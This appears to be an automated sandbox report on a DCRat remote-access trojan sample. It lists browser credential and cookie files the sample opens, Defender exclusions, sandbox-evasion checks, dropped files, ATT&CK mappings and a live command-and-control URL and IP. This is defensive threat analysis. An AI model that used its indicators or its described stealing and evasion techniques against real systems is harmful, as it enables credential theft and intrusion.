                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3XtEci4Mmo.exe PID: 5444, type: MEMORYSTR
Source: Yara match | File source: 3XtEci4Mmo.exe, type: SAMPLE
Source: Yara match | File source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
Source: Yara match | File source: 3XtEci4Mmo.exe, type: SAMPLE
Source: Yara match | File source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 3XtEci4Mmo.exe PID: 5444, type: MEMORYSTR
Source: Yara match | File source: 3XtEci4Mmo.exe, type: SAMPLE
Source: Yara match | File source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
Source: Yara match | File source: 3XtEci4Mmo.exe, type: SAMPLE
Source: Yara match | File source: 0.0.3XtEci4Mmo.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Google\Chrome\Application\conhost.exe, type: DROPPED
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 241 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 133 Masquerading; 261 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 File and Directory Discovery; 144 System Information Discovery; 341 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph (ID: 1586105; Sample: 3XtEci4Mmo.exe; Startdate: 08/01/2025; Architecture: WINDOWS; Score: 100)

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 18 other signatures.

Process tree (node numbers as in the original graph):

• 9 TezdDRgSgyeGDKRkzk.exe: dropped C:\Users\user\Desktop\yUQAQjKk.log (PE32), C:\Users\user\Desktop\swyioMDw.log (PE32), C:\Users\user\Desktop\sTDIJUfq.log (PE32) and 22 other malicious files; started 20 cmd.exe.
• 12 3XtEci4Mmo.exe 4 46: dropped C:\Windows\INF\...\TezdDRgSgyeGDKRkzk.exe (PE32), C:\Users\user\Desktop\zhcyQjUk.log (PE32), C:\Users\user\Desktop\xfqPuAPp.log (PE32) and 31 other malicious files; signatures: Adds a directory exclusion to Windows Defender, Creates processes via WMI; started 22 powershell.exe, 25 cmd.exe, 27 powershell.exe 23 and 29 (10 other processes).
• 15 conhost.exe: Multi AV Scanner detection for dropped file.
• 17 (3 other processes): 127.0.0.1 unknown unknown.
• 20 cmd.exe: started 31 TezdDRgSgyeGDKRkzk.exe and 36 conhost.exe.
• 22 powershell.exe: Loading BitLocker PowerShell Module; started 38 schtasks.exe and 46 (15 other processes).
• 25 cmd.exe: Uses ping.exe to sleep; Drops executables to the windows directory (C:\Windows) and starts them; Uses ping.exe to check the status of other devices and networks; started 48 (4 other processes).
• 27 powershell.exe: Uses schtasks.exe or at.exe to add and modify task schedules; started 40 conhost.exe.
• 29 (10 other processes): started 42 conhost.exe, 44 conhost.exe and 50 (8 other processes).
• 31 TezdDRgSgyeGDKRkzk.exe: network 185.177.239.66 (ports 49955, 49971, 49984; M247GB, Poland); dropped C:\Users\user\Desktop\xLpaQOdH.log (PE32), C:\Users\user\Desktop\wFqSLbvP.log (PE32), C:\Users\user\Desktop\udiCoAET.log (PE32) and 22 other malicious files; signatures: Tries to harvest and steal browser information (history, passwords, etc), Adds a directory exclusion to Windows Defender; started 52 powershell.exe, 55 powershell.exe, 57 powershell.exe and 59 (9 other processes).
• 38 schtasks.exe: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines).
• 52 powershell.exe: Loading BitLocker PowerShell Module; started 61 conhost.exe.
• 55 powershell.exe: started 63 conhost.exe.
• 57 powershell.exe: started 65 conhost.exe.
• 59 (9 other processes): started 67 conhost.exe, 69 conhost.exe, 71 conhost.exe and 73 (6 other processes).

Source | Detection | Scanner | Label | Link
3XtEci4Mmo.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
3XtEci4Mmo.exe | 100% | Avira | HEUR/AGEN.1323342 |
3XtEci4Mmo.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files\Google\Chrome\Application\conhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files\Google\Chrome\Application\conhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Google\Chrome\Application\conhost.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Google\Chrome\Application\conhost.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Google\Chrome\Application\conhost.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\conhost.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\AfaiVEic.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\BargBgFj.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\BnpyIbbb.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\BwYQnKCg.log | 3% | ReversingLabs | |
C:\Users\user\Desktop\EEJGOfpT.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\EVQZcBiW.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\FAtHPtxq.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\FQiXIcGc.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\FizIvULx.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\HDgqkcCm.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\HTUGeMKX.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\IrkyWqxk.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\KVHoAvPS.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\LBbeHZkL.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\LCxGrujI.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\MgnHXjFm.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\NPXweASH.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\OlTNIjCM.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\QImfPxDF.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\QNGyvuni.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\QWdyfgGf.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\QXRfkjyW.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\QujYzohZ.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\RGOnlxSA.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\RmrNprNr.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\SDpvGwhv.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\SYQgAPKa.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\SingkCdX.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\TfOoGCsS.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\ThILVSlx.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\UXWdwFYk.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\VZRFxCWH.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\VkvurCps.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\WBPEscIu.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\WgiUHyMw.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\XQlMiBJi.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\XjnFxUBI.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\XmhcMluo.log | 11% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\Zallyypm.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\ZrGvzZJn.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\afwLyhfm.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\bQGwUejE.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\bcXTThuh.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\dVnCFeff.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\exStwvKV.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\fSOKaeua.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\gPpSweJV.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\jGLeSKCo.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\jybLobci.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\kHClnwJL.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\kOdTVPKT.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\kuPmEXym.log | 3% | ReversingLabs | |
C:\Users\user\Desktop\lnWbuaeE.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\mHfKTHWS.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\mzvrpXvN.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\npJJQJjz.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\pHCSiMBb.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\pKSShysD.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\pyJigHPD.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\qwPLRqWX.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\rNFADhxz.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\rmNqRUKB.log | 17% | ReversingLabs | |
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php | 0% | Avira URL Cloud | safe |

No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://185.177.239.66/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDA0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
https://duckduckgo.com/ac/?q= | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000054.00000003.2651347076.00000241EDAA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDB07000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
